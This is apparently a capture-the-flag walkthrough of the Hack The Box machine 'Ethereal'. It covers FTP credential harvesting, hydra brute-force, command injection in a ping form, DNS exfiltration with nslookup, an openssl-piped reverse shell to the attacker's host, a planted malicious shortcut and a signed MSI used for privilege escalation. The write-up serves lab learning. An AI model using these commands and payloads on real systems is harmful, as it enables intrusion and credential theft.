This machine was absolutely insane, mind boggling and fun at the same time. It took me a lot of painful days to own this machine but eventually, hard work wins. It was definitely not easy to enumerate mainly due to the slow speed and also the way things had to be located. Nonetheless, an awesome machine for learning.
Before following this walkthrough, I highly recommend trying to get the flag yourself! Just like you will hear from everyone else, try harder! (if you cannot find it)
First up, we’ll scan the box using basic nmap scripts and then go from there (Enumerate!).
root@kali:~/Ethereal# nmap -v -p- -sC -sV -oA nmap 10.10.10.106 # Nmap 7.70 scan initiated Sat Mar 23 11:04:51 2019 as: nmap -v -p- -sC -sV -oA nmap 10.10.10.106 Nmap scan report for 10.10.10.106 Host is up (0.11s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Cant get directory listing: PASV IP 172.16.249.135 is not the same as 10.10.10.106 | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ethereal 8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Well, so we have a few ports open, port 21, 80 and 8080.
I always like to check the low-hanging fruit first. So let’s get into FTP since
anonymous login is allowed. This is a common misconfiguration for FTP logins. You never know what you might find but always is useful.
root@kali:~/Ethereal# ftp 10.10.10.106 Connected to 10.10.10.106. 220 Microsoft FTP Service Name (10.10.10.106:pswapnil): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 07-10-18 09:03PM <DIR> binaries 09-02-09 08:58AM 4122 CHIPSET.txt 01-12-03 08:58AM 1173879 DISK1.zip 01-22-11 08:58AM 182396 edb143en.exe 01-18-11 11:05AM 98302 FDISK.zip 07-10-18 08:59PM <DIR> New folder 07-10-18 09:38PM <DIR> New folder (2) 07-09-18 09:23PM <DIR> subversion-1.10.0 11-12-16 08:58AM 4126 teamcity-server-log4j.xml 226 Transfer complete.
I created a copy of the FTP data on my local drive. Found a zip file
FDISK.zip, unzipped it and mounted it as a drive.
root@kali:~/Ethereal/ftp-data# mount FDISK fdisk root@kali:~/Ethereal/ftp-data# ls -la fdisk/pbox total 88 drwxr-xr-x 2 root root 512 Jul 2 2018 . drwxr-xr-x 3 root root 7168 Dec 31 1969 .. -rwxr-xr-x 1 root root 284 Jul 2 2018 pbox.dat -rwxr-xr-x 1 root root 81384 Aug 25 2010 pbox.exe
pbox?! What’s that? A little Google-Fu and I found that it’s a password box or a dos-based password manager.
So, I used this software to try and load the data from the
I copied the
pbox.dat file I found in the FTP session to my home directory as
.pbox.dat. After executing the pbox client we just downloaded for Linux, it prompted me for the password.
root@kali:~/Ethereal# ./pbox Enter your master password: password
I guessed the password trying out
pbox, etc, got it right for
password. It opened the following screen.
--dump option, I was able to dump all the usernames and passwords and store them locally.
root@kali:~/Ethereal# ./pbox --dump Enter your master password: ******** databases -> 7oth3B@tC4v3! msdn -> firstname.lastname@example.org / P@ssword1! learning -> alan2 / learn1ng! ftp drop -> Watch3r backup -> alan / Ex3cutiv3Backups website uploads -> R3lea5eR3@dy# truecrypt -> Password8 management server -> !C414m17y57r1k3s4g41n! svn -> alan53 / Ch3ck1ToU7>
That was it from FTP. I believe, the tedious process to just be able to obtain a dump is evidence that this box isn’t an wasy one.
In the web browser, we get the following window as a welcome page.
Moving around, I found a menu item called
Admin, let’s go there.
Many menu items here as well. The only important one was
Ping. Clicking on it redirected me to
ethereal.htb:8080 and gave me the following page.
Time to add
ethereal.htb to the
hosts file. Also, the
Notes menu took me to a page where it mentioned the name
Alan, ring a bell? It’s the same name that appeared in the
hosts file is updated, clicking the
Ping option again got me an HTTP authentication page.
Fortunately, we have a list of usernames and passwords from the dump that we obtained earlier. Use that to brute-force the HTTP authentication.
root@kali:~/Ethereal# hydra -L usernames -P passwords -s 8080 -f ethereal.htb http-get / Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. [DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:4/p:9), ~3 tries per task [DATA] attacking http-get://ethereal.htb:8080/ [http-get] host: ethereal.htb login: alan password: !C414m17y57r1k3s4g41n! 1 of 1 target successfully completed, 1 valid password found
There’s the login. Using that, we find this page.
I put my IP address in the text-field and it showed
Connection to host successful. Let’s try to capture packets this time around using
root@kali:~/Ethereal# tcpdump -i tun0 icmp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 12:57:58.345968 IP ethereal.htb > kali: ICMP echo request, id 1, seq 235, length 40 12:57:58.345989 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 235, length 40 12:57:59.616726 IP ethereal.htb > kali: ICMP echo request, id 1, seq 236, length 40 12:57:59.616884 IP kali > ethereal.htb: ICMP echo reply, id 1, seq 236, length 40
We get 2 pings! Looks weird. Based on a guess, it’s running something like
ping -n2 <ip>. Let’s find out if this box allows DNS queries. I’ll use
& nslookup abcde <myip> in the text field. Try to see it using tcpdump.
root@kali:~/Ethereal# tcpdump -ni tun0 udp port 53 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 19:49:18.150063 IP 10.10.10.106.50772 > 10.10.16.39.53: 3+ AAAA? abcde. (23)
Great! So we can get data from DNS.
Enumeration using injection
During my really slow enumeration, I found a world writable directory and used
& netsh advfirewall firewall show rule name=all dir=out verbose > c:\users\public\desktop\shortcuts\firewall_rules.txt to list all the firewall rules in the .txt file.
& for /f "eol=- skip=100 tokens=1-10*" %i in (c:\users\public\desktop\shortcuts\firewall_rules.txt) do nslookup %i_%j_%k_%l_%m_%o_%p_%q <my ip>, I got the data in my terminal.
I found that the following rules had been set.
Rule Name: Allow TCP Ports 136 Enabled: Yes Direction: Out Profiles: Domain,Private,Public Grouping: LocalIP: Any RemoteIP: Any Protocol: TCP LocalPort: Any RemotePort: 73,136 Edge traversal: No InterfaceTypes: Any Security: NotRequired Rule source: Local Setting Action: Allow
Also, I located a OpenSSL binary in the
C: drive. Using
& for /f "usebackq tokens=*" %i in (dir /b c:\progra~2\openss~1.0\bin`) do nslookup %i
Shell using OpenSSL
Let’s test whether we can connect to a server using this openssl binary. I created key and certificate for our server.
root@kali# openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem Generating a RSA private key ....+++++ ................................+++++ writing new private key to 'key.pem' ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) : Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) : Common Name (e.g. server FQDN or YOUR name) : Email Address : root@kali# ls *.pem cert.pem key.pem
I ran a OpenSSL server using
openssl s_server -quiet -key key.pem -cert cert.pem -port 73 and I used
& quiet ( echo "abcde" | c:\progra~2\openss~1.0\bin\openssl.exe s_client -quiet -connect <ip>:73 ) to test the connection.
root@kali# sudo openssl s_server -quiet -key key.pem -cert cert.pem -port 73 "abcde"
Great! We can send data over using OpenSSL. Now, in order to get a shell, we need to set up two SSL servers running on my machine and use
& c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect <ip>:73 | cmd.exe /k /q | c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect <ip>:136 to get a shell.
I already have a server running on port 73 now we will start one on port 136 and put the command above into the browser.
root@kali# openssl s_server -quiet -key key.pem -cert cert.pem -port 136 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>
And we have a shell! Let’s hunt for the
I could not find a user.txt file on alan’s desktop but found a
c:\Users\alan\Desktop>type note-draft.txt I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead. - Alan
Shortcut on a public desktop? Let’s find out.
c:\Users\Public\Desktop\Shortcuts>dir Volume in drive C has no label. Volume Serial Number is FAD9-1FD5 Directory of c:\Users\Public\Desktop\Shortcuts 07/17/2018 08:15 PM <DIR> . 07/17/2018 08:15 PM <DIR> .. 07/06/2018 02:28 PM 6,125 Visual Studio 2017.lnk 1 File(s) 6,125 bytes 2 Dir(s) 15,427,989,504 bytes free
I generated a
.lnk file using LNKUp using
python generate.py --host localhost --type ntlm --output payload.lnk --execute "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect <myip>:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect <myip>:136"
Once we have the
.lnk file, we can create a
base64 of it and copy it to the system using
openssl base64 -A -e -in payload.lnk -out payload.
Now let’s copy the string to the windows machine. To do that we could use
echo | set /p="TAAA...Y28AAAAA" > c:/users/public/desktop/shortcuts/b64file.txt, now let’s replace the Visual Studio 2017.lnk file. I will use
cd c:\users\public\desktop\shortcuts && c:\progra~2\openssl-v1.1.0\bin\openssl base64 -A -d -in b64file.txt -out "Visual Studio 2017.lnk"
I restarted the OpenSSL shells on port 73 and 136 and within a few seconds, I see this…
root@kali# openssl s_server -quiet -key key.pem -cert cert.pem -port 136 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\jorge\Documents>whoami ethereal\jorge C:\Users\jorge\Documents>type c:\users\jorge\desktop\user.txt 2******************************d
Awesome! Feel’s good after doing so much, finally we have the
user.txt file. But its not over yet.
I found two drives mounted on the system,
D:, I found the following information from the
D:\Certs>dir Volume in drive D is Development Volume Serial Number is 54E5-37D1 Directory of D:\Certs 07/07/2018 09:50 PM <DIR> . 07/07/2018 09:50 PM <DIR> .. 07/01/2018 09:26 PM 772 MyCA.cer 07/01/2018 09:26 PM 1,196 MyCA.pvk 2 File(s) 1,968 bytes 2 Dir(s) 8,437,514,240 bytes free D:\DEV\MSIs>dir Volume in drive D is Development Volume Serial Number is 54E5-37D1 Directory of D:\DEV\MSIs 07/08/2018 10:09 PM <DIR> . 07/08/2018 10:09 PM <DIR> .. 07/18/2018 09:47 PM 133 note.txt 1 File(s) 133 bytes 2 Dir(s) 8,437,514,240 bytes free D:\DEV\MSIs>type note.txt Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already. - Rupal
Next task, create a
I used a tool called EMCO MSI Package Builder.
C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>makecert.exe -pe -n "CN=My SPC" -a sha256 -cy end -sky signature -ic \Users\pswapnil\Desktop\myca.cer -iv \Users\pswapnil\Desktop\myca.pvk -sv \Users\pswapnil\Desktop\MySPC.pvk \Users\pswapnil\Desktop\MySPC.cer Succeeded C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>pvk2pfx.exe -pvk \Users\pswapnil\Desktop\MySPC.pvk -spc \Users\pswapnil\Desktop\MySPC.cer -pfx \Users\pswapnil\Desktop\MySPC.pfx C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>signtool.exe sign /v /f \Users\pswapnil\Desktop\MySPC.pfx /tr "http://timestamp.digicert.com" /td sha256 /fd sha256 \Users\pswapnil\Desktop\ethereal\ethereal.msi The following certificate was selected: Issued to: My SPC Issued by: My CA Expires: Sat Dec 31 15:59:59 2039 SHA1 hash: 4AE112B8A498C3054308367DD04C80AA921B4BD4 Done Adding Additional Store Successfully signed and timestamped: \Users\pswapnil\Desktop\ethereal\ethereal.msi Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0
Let’s copy the msi to the system using
openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < ethereal.msi and run
& c:\progra~2\openssl-v1.1.0\bin\openssl.exe s_client -quiet -connect <myip>:73 > c:\users\public\desktop\shortcuts\ethereal.msi on the web form.
C:\Users\jorge\Documents>cd c:\users\public\desktop\shortcuts C:\Users\Public\Desktop\Shortcuts>copy /y ethereal.msi d:\DEV\MSIs
After copying the msi to the
D: drive, I got the root.txt a few seconds later.
C:\Users\Public\Desktop\Shortcuts>type getmeroot.txt 1******************************f
Finally! So much to do in this box. A great experience nonetheless.
Happy Hacking! Cheers!